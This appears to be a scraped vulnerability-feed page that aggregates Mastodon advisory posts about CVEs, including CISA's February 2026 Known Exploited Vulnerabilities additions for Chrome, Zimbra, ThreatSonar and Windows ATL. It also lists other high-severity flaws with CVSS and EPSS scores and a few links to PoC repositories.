🚨 CVE-2026-2630: CRITICAL OS Command Injection in Tenable Security Center (CVSS 9.9). Authenticated attackers can run arbitrary code on the server. Restrict access, monitor logs, and patch ASAP. radar.offseq.com/threat/cve-20 #OffSeq #Tenable #Vuln

##

CVE-2026-2441
(8.8 HIGH)

EPSS: 0.03%

updated 2026-02-17T21:22:16.427000

6 posts

Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

1 repos

https://github.com/b1gchoi/CVE-2026-2441_POC

secdb at 2026-02-17T22:00:17.716Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:45.000Z ##

CVE ID: CVE-2026-2441
Vendor: Google
Product: Chromium
Date Added: 2026-02-17
Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

secdb@infosec.exchange at 2026-02-17T22:00:17.000Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:45.000Z ##

CVE ID: CVE-2026-2441
Vendor: Google
Product: Chromium
Date Added: 2026-02-17
Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

youranonnewsirc@nerdculture.de at 2026-02-17T09:50:12.000Z ##

Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.

#AnonNews_irc #Cybersecurity #News

##

youranonnewsirc@nerdculture.de at 2026-02-17T03:50:08.000Z ##

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

##

CVE-2025-13691
(8.1 HIGH)

EPSS: 0.00%

updated 2026-02-17T21:22:13.900000

2 posts

IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.

thehackerwire@mastodon.social at 2026-02-17T22:00:16.000Z ##

🟠 CVE-2025-13691 - High (8.1)

IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T22:00:16.000Z ##

🟠 CVE-2025-13691 - High (8.1)

IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-7694
(7.2 HIGH)

EPSS: 1.36%

updated 2026-02-17T21:22:13.697000

4 posts

ThreatSonar Anti-Ransomware from TeamT5 does not properly validate the content of uploaded files. Remote attackers with administrator privileges on the product platform can upload malicious files, which can be used to execute arbitrary system command on the server.

secdb at 2026-02-17T22:00:17.716Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:14.000Z ##

CVE ID: CVE-2024-7694
Vendor: TeamT5
Product: ThreatSonar Anti-Ransomware
Date Added: 2026-02-17
Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

secdb@infosec.exchange at 2026-02-17T22:00:17.000Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:14.000Z ##

CVE ID: CVE-2024-7694
Vendor: TeamT5
Product: ThreatSonar Anti-Ransomware
Date Added: 2026-02-17
Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2020-7796
(9.8 CRITICAL)

EPSS: 90.60%

updated 2026-02-17T21:22:12.967000

4 posts

Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.

Nuclei template

secdb at 2026-02-17T22:00:17.716Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

##

cisakevtracker@mastodon.social at 2026-02-17T21:00:59.000Z ##

CVE ID: CVE-2020-7796
Vendor: Synacor
Product: Zimbra Collaboration Suite
Date Added: 2026-02-17
Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

secdb@infosec.exchange at 2026-02-17T22:00:17.000Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441

##

cisakevtracker@mastodon.social at 2026-02-17T21:00:59.000Z ##

CVE ID: CVE-2020-7796
Vendor: Synacor
Product: Zimbra Collaboration Suite
Date Added: 2026-02-17
Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2008-0015
(8.8 HIGH)

EPSS: 87.52%

updated 2026-02-17T21:16:49.580000

4 posts

Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in th

secdb at 2026-02-17T22:00:17.716Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:30.000Z ##

CVE ID: CVE-2008-0015
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-17
Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

secdb@infosec.exchange at 2026-02-17T22:00:17.000Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:30.000Z ##

CVE ID: CVE-2008-0015
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-17
Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-70956
(7.5 HIGH)

EPSS: 0.02%

updated 2026-02-17T18:34:01

2 posts

A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation moves critical resources (specifically libraries and log) from the parent state to a new child state in a non-atomic manner. If an Out-of-Gas (OOG) except

thehackerwire@mastodon.social at 2026-02-17T16:36:31.000Z ##

🟠 CVE-2025-70956 - High (7.5)

A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation m...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:36:31.000Z ##

🟠 CVE-2025-70956 - High (7.5)

A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation m...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65753
(9.1 CRITICAL)

EPSS: 0.00%

updated 2026-02-17T18:33:00

2 posts

An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.

1 repos

https://github.com/diegovargasj/CVE-2025-65753

thehackerwire@mastodon.social at 2026-02-17T17:33:54.000Z ##

🔴 CVE-2025-65753 - Critical (9)

An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T17:33:54.000Z ##

🔴 CVE-2025-65753 - Critical (9)

An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70397
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-17T18:33:00

2 posts

jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.

thehackerwire@mastodon.social at 2026-02-17T17:33:35.000Z ##

🟠 CVE-2025-70397 - High (8.8)

jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T17:33:35.000Z ##

🟠 CVE-2025-70397 - High (8.8)

jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70830
(10.0 CRITICAL)

EPSS: 0.00%

updated 2026-02-17T18:33:00

2 posts

A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.

1 repos

https://github.com/xiaoxiaoranxxx/CVE-2025-70830

thehackerwire@mastodon.social at 2026-02-17T16:22:04.000Z ##

🔴 CVE-2025-70830 - Critical (9.9)

A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:22:04.000Z ##

🔴 CVE-2025-70830 - Critical (9.9)

A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70828
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-17T18:32:57

2 posts

An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration

1 repos

https://github.com/xiaoxiaoranxxx/CVE-2025-70828

thehackerwire@mastodon.social at 2026-02-17T17:33:45.000Z ##

